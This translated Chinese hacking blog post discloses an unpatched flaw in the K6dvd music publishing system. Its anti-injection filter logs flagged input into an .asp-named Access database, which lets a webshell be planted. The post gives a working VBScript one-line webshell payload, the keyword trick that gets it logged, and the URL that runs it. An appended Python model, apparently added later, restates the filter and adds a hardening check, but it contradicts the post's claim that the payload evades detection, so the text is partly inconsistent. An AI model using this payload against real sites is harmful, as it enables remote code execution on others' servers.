K6dvd Music Network 0day (the anti-injection system's embarrassment)

Source: Internet
Author: User
Tags: servervariables

I haven't read code for a long time~ I believe many predecessors already knew this bug before I posted it!! P.S.: although I never found it myself, it may simply be that nobody has paid attention to this network for too long! Ah~~

K6dvd is a well-known music publishing management system in China!

Today Yu asked me to publish some penetration articles for everyone to discuss this week!~ I wanted to refuse, because I haven't done any penetration work for a while, so there is nothing to write about! But I still flipped through some sites at random to see whether I could put together a newbie-level penetration article...

I found a music publishing site! The URL is withheld; this is not meant as a penetration target~ Oh!

Submitting a URL with a tampered parameter returns the following:

Well, an anti-injection system! Most people who do penetration testing will have seen this one~

Illegal operation! The system has made the following record:
Operation IP: xxx.xx
Operation time: 19:33:47
Operation page: /yxplay.asp
Submission method: GET
Submitted parameter: id
Submitted data: 109446

Oh, it also logs my IP~~

I tried a few common penetration ideas at random~ It did not go well, because the anti-injection system blocked everything! So I downloaded the music system's source code to see whether I could turn up a 0day~ And that is how this article came about!!

Let's take a look at the anti-injection system. It lives in conn.asp and SQL.asp; the relevant section is shown below:

Dim dbkillSql, killSqlconn, connkillSql
dbkillSql = "data/#SQL.asp"
On Error Resume Next
Set killSqlconn = Server.CreateObject("ADODB.Connection")
connkillSql = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(dbkillSql)
killSqlconn.Open connkillSql

This opens a connection to the log database, an Access file stored under the web root as data/#SQL.asp!
'-------- POST part ------------------
' Fy_Inf (the keyword list split on "|") and WriteSql (whether to log to the database) are set earlier in SQL.asp
If Request.Form <> "" Then
  For Each Fy_Post In Request.Form
    For Fy_Xh = 0 To Ubound(Fy_Inf)
      If Instr(LCase(Request.Form(Fy_Post)), Fy_Inf(Fy_Xh)) <> 0 Then
        If WriteSql = True Then
          ' The matched value is written, quotes doubled for SQL only, into the .asp "database"
          killSqlconn.execute("insert into 9j455(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('" & Request.ServerVariables("REMOTE_ADDR") & "','" & Request.ServerVariables("URL") & "','POST','" & Fy_Post & "','" & replace(Request.Form(Fy_Post), "'", "''") & "')")
          killSqlconn.close
          Set killSqlconn = Nothing
        End If
        Response.Write "<Script Language=JavaScript>alert('Happy Audio/Video Entertainment Network reminds you: please do not submit illegal characters or parameters to this site in an attempt to inject!');</Script>"
        Response.Write "Illegal operation! The system has made the following record:<br>"
        Response.Write "Operation IP: " & Request.ServerVariables("REMOTE_ADDR") & "<br>"
        Response.Write "Operation time: " & Now & "<br>"
        Response.Write "Operation page: " & Request.ServerVariables("URL") & "<br>"
        Response.Write "Submission method: POST<br>"
        Response.Write "Submitted parameter: " & Fy_Post & "<br>"
        Response.Write "Submitted data: " & Request.Form(Fy_Post)
        Response.End
      End If
    Next
  Next
End If

Well, this is what produces the alert and the error page shown above!

Take a closer look and you find an interesting line: killSqlconn.execute("insert into 9j455(Sqlin_IP,SqlIn_Web,SqlIn_FS,SqlIn_CS,SqlIn_SJ) values('" & Request.ServerVariables("REMOTE_ADDR") & "','" & Request.ServerVariables("URL") & "','POST','" & Fy_Post & "','" & replace(Request.Form(Fy_Post), "'", "''") & "')")

On its own this is just the log record: the IP, the URL, the request method, the parameter name and the content the injector submitted!! But look back at Server.CreateObject("ADODB.Connection") and its data source: the database this log is written into is data/#SQL.asp, an Access file with an .asp extension, so whatever gets stored in it is served through the ASP engine... Then if we submit <%execute(request("wooden"))%>, won't that write a one-line shell into #SQL.asp? Don't get too excited; look again:

' Customise the strings to be filtered, separated by "|"
Fy_In = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"

The strings to be caught are listed in Fy_In. If any of them appears (case-insensitively) in a submitted value, the request is treated as an injection attempt: the value is written into the log database and processing stops with the error page above!

If you have learned regular expressions this is no problem, and even less of one for JavaScript masters. After changing it over and over again, a Trojan that slips past all of the detection statements above is finally born~ Only eval gives the pleasure here: execute throws an error!

<script runat=server language=vbscript>eval request(chr(35))</script>

Exploit method: and => <script runat=server language=vbscript>eval request(chr(35))</script> (the keyword and trips the filter, and the entire submitted value is written into #SQL.asp)

Then request data/%23sql.asp (%23 is # URL-encoded) and the one-line shell, fed through the # parameter, executes.
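To make the two points above concrete (what the filter in SQL.asp does with a matched value, and why the payload ends up executable), here is an added Python model of the logging path. This is illustrative code written for this page, not K6dvd's code and not the anti-injection script's own code. It reproduces the keyword test and the insert from the POST branch, then asks the question the exploit turns on: does the stored copy of a matched value carry markers that IIS executes when data/#SQL.asp is requested? The keyword list is the one on the page; the sample values, the list of IIS script extensions and all function names are assumptions added for illustration. Note that the page's own payload is caught by the chr keyword, and being caught is exactly what gets it written to the file. The last function is the minimal hardening the page implies: a log database must not be a file IIS treats as script.

```python
"""Python model of the Fy_ anti-injection logging path shown on this page.

Added for illustration; not code from K6dvd or from the anti-injection script.
"""
import re

# Keyword list as defined in Fy_In on this page (the first entry is a single quote).
FY_IN = "'|;|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"
FY_INF = FY_IN.split("|")

# Markers that make the ASP engine treat file content as server-side code:
# the <% ... %> delimiters and a <script runat=server ...> block.
ASP_CODE = re.compile(r"<%|<script[^>]*\brunat\s*=\s*[\"']?server", re.IGNORECASE)

# Extensions IIS 5/6 map to asp.dll on a default install (assumption for this example).
IIS_SCRIPT_EXTENSIONS = (".asp", ".asa", ".cer", ".cdx")


def matched_keyword(value):
    """Mirror Instr(LCase(value), Fy_Inf(Fy_Xh)) <> 0: first keyword found, or None."""
    low = value.lower()
    for kw in FY_INF:
        if kw in low:
            return kw
    return None


def sql_literal(value):
    """The text the page's insert places between single quotes: ' doubled for Jet.

    This is SQL escaping only, so the attacker cannot break out of the INSERT;
    Jet stores the original text, quote for quote, in the SqlIn_SJ column.
    """
    return value.replace("'", "''")


def logged_value(value):
    """Text that ends up in the log table, or None when no keyword matched
    and nothing was logged. The stored row holds the submitted value unchanged."""
    if matched_keyword(value) is None:
        return None
    return value


def shell_lands_in_log(value):
    """True when the logged copy carries ASP code markers, i.e. the 'log'
    database doubles as a webshell once data/#SQL.asp is requested over HTTP."""
    stored = logged_value(value)
    return stored is not None and ASP_CODE.search(stored) is not None


def log_db_is_web_executable(db_path):
    """Hardening check: a log database must not carry an extension IIS executes.
    Keeping the file outside the web root is the real fix; .mdb under data/ is
    the bare minimum."""
    return db_path.lower().endswith(IIS_SCRIPT_EXTENSIONS)


if __name__ == "__main__":
    # Constructed sample values, not captured traffic.
    samples = [
        "1",                                        # clean value: nothing is logged
        "1 and 1=1",                                # ordinary probe: logged, harmless as ASP
        '<%execute request("#")%>',                 # classic one-liner: caught by exec
        "<script runat=server language=vbscript>eval request(chr(35))</script>",  # page's payload
    ]
    for s in samples:
        print(f"{s[:60]:60} keyword={matched_keyword(s)!r:8} shell_in_log={shell_lands_in_log(s)}")
    print("data/#SQL.asp executable by IIS:", log_db_is_web_executable("data/#SQL.asp"))
```

Run it as a script to see that every value with a keyword is written verbatim, that both the <% %> one-liner and the page's <script runat=server> variant survive the trip into the file, and that the only thing standing between the log and a webshell is the .asp extension on the database path.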
